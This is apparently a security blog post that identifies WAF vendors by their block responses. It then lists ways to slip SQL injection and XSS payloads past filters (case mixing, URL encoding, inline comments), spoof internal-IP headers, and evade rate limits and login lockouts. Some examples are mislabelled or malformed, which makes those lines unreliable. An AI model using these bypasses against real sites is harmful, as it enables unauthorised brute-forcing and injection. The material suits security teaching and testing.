Unique WAF Bypassing Methods…!!!
What is WAF…???
A web application firewall (WAF) is a firewall that monitors, filters, and blocks data packets as they travel to and from a website or web application.
A WAF can be either network-based, host-based, or cloud-based and is often deployed through a reverse proxy and placed in front of one or more websites or applications.
How does Actually WAF Works
A WAF analyzes Hypertext Transfer Protocol (HTTP) requests and applies a set of rules that define what parts of that conversation are benign and what parts are malicious. The main parts of HTTP conversations that a WAF analyzes are GET and POST requests. GET requests are used to retrieve data from the server, and POST requests are used to send data to a server to change its state.
The typical working style of WAF
Whitelisting, Blacklisting, Hybrid Security: Uses both the Above as rules.
Vendors for WAF:
AWS,Cloudflare,Akamai,Imperva,Verizon[EdgeCast],Sucuri and Many more
Responses Types to WAF:
AWS-WAF: awselb/2.0, AWSALB cookie values, Also sometimes with custom responses
CloudFront: Generated by CloudFront (CloudFront)
Cloudflare: CLOUDFLARE_ERROR_500S_BOX
Akamai: AkamaiGHost
Imperva: Powered By Incapsula
Sucuri: Sucuri, X-Sucuri-ID, Access Denied — Sucuri Website Firewall
Verizon[EdgeCast]: Please contact the site administrator, and provide the following Reference ID: EdgeCast Web Application Firewall (Verizon)
F5 ASM: The requested URL was rejected.
ModSecurity: This error was generated by Mod_Security
NetScaler: NS-Cache
Nexusguard: speresources.nexusguard.com/wafpage/index.html
Palo Alto: Palo Alto Next-Generation Security Platform text snippet.
SonicWall: This request is blocked by the SonicWALL.
Sophos : Powered by UTM Web Protection
ZenEdge: X-Zen-Fury header.
Few facts on WAF
WAF`s Use the common ports such as port no 80,443,8008,8080 and 8088.
WAF`s Creates its own cookies while in the session.
WAF`s shows its presence in the response headers.
WAF`s Does not give complete control over DOS, DDOS attacks.
WAF`s can respond with unique response codes such as Descriptive errors
WAF`s are easily identifiable from simple network mappers such as traceroute, Nmap, response headers, Curl, banners
Unique Methods to bypass WAF security
When you are on Login Page.
Blocked Reason:
If the Waf is Blocking you from an intruder. [Account lockout, Brute Forcing]
/v1/auth/login
Bypassing method:
Use random user-agents, ranging from Chrome Desktop to Phone browser.
use proxy chains, since chances are real that your IP gets blocked.
Use slight changes in Api path such as /v2/auth/login
Try with case sensitive`s at the paths such as /V1/auth/login
While checking for Sql Injection:
Blocked Reason
union select user, password from users
Bypassing methods
|| (select user from users where user_id = 1) = ‘admin’
While working on XSS:
Blocked reason:
<script>alert(1)</script>
SELECT * FROM all_tables WHERE OWNER = ‘DATABASE_NAME’
Bypassing method:
<ScRipT>alert()</sCRipT>
sELecT * FrOm all_tables whERe OWNER = ‘DATABASE_NAME’
While working on URL Encoding:
Encode normal payloads with % encoding/URL encoding.
Blocked Reason:
1. <svG/x=”>”/oNloaD=confirm()//
2. uNIoN(sEleCT 1,2,3,4,5,6,7,8,9,10,11,12)
Bypassing Method:
1. %3CsvG%2Fx%3D%22%3E%22%2FoNloaD%3Dconfirm%28%29%2F%2F
2. uNIoN%28sEleCT+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%29
While Checking with Comments:
Comments obfuscate standard payload vectors.
Blocked Reason:
1. <script>alert()</script>
2. /?id=1+union+select+1,2,3 —
3. <a href=javascript;alert()>ClickMe
Bypassing Method:
1. <! →<script>alert/**/()/**/</script>
2. /?id=1+un/**/ion+sel/**/ect+1,2,3 —
3. <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
While working on Request Header Spoofing:
Our target is to fool the WAF/server into believing it was from their internal network. Adding some spoofed headers to represent the internal network, does the trick. With each request, some set of headers is to be added simultaneously thus spoofing the origin.
The upstream proxy/WAF misinterprets the request was from their internal network and lets our gory payload through.
Bypassing Method:
1. X-Originating-IP: 127.0.0.1
2. X-Forwarded-For: 127.0.0.1
3. X-Remote-IP: 127.0.0.1
4. X-Remote-Addr: 127.0.0.1
5. X-Client-IP: 127.0.0.1
While checking for Rate limit:
Blocked reason:
The attacker is able to send 5000 requests within 10 mins, post 5000+ requests should be forbidden [403]
GET/POST/DELETE /v3/admin/add_data/122
Host: example.com
Bypassing methods
1. GET/POST/DELETE /../../../../../../v3/admin/add_data/122
Host: example.com
2. GET/POST/DELETE /v3/admin/add_data/122/../../../../../../../
Host: example.com
3. GET/POST/DELETE /v3/admin/add_data/122
Host: TAMPERD.example.com
4. GET/POST/DELETE /v3/admin/add_data/122
Host: example.com
x-forwaredHost:127.0.0.1
5. GET/POST/DELETE /v3/admin/add_data/122
Remove all the request headers and send
Suggestions are most welcomed, Please write a mail to Akash.venky091@gmail.com, Also you can follow me here for more updates on Security,Ethical hacking Akash Venky
or contact me @ https://www.linkedin.com/in/akash-h-c-4a4090a7/